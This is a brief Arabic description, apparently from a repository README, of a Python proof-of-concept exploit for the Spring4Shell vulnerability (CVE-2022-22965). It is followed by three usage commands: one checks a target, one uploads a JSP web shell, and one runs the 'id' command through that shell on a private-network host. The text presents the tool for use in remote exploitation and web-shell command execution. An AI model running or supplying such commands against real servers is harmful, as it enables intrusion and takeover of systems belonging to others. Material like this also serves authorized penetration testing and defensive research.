
استغلال إثبات المفهوم بلغة Python لـ CVE-2022-22965 (Spring4Shell) مع إمكانيات فحص الثغرات والاستغلال عن بُعد وتنفيذ أوامر الويب شيل.
python spring4shell.py -u http://192.168.110.117:8080/helloworld/greeting --check
python spring4shell.py -u http://192.168.110.117:8080/helloworld/greeting -f shell.jsp --exploit
python spring4shell.py -u http://192.168.110.117:8080/shell.jsp --cmd id
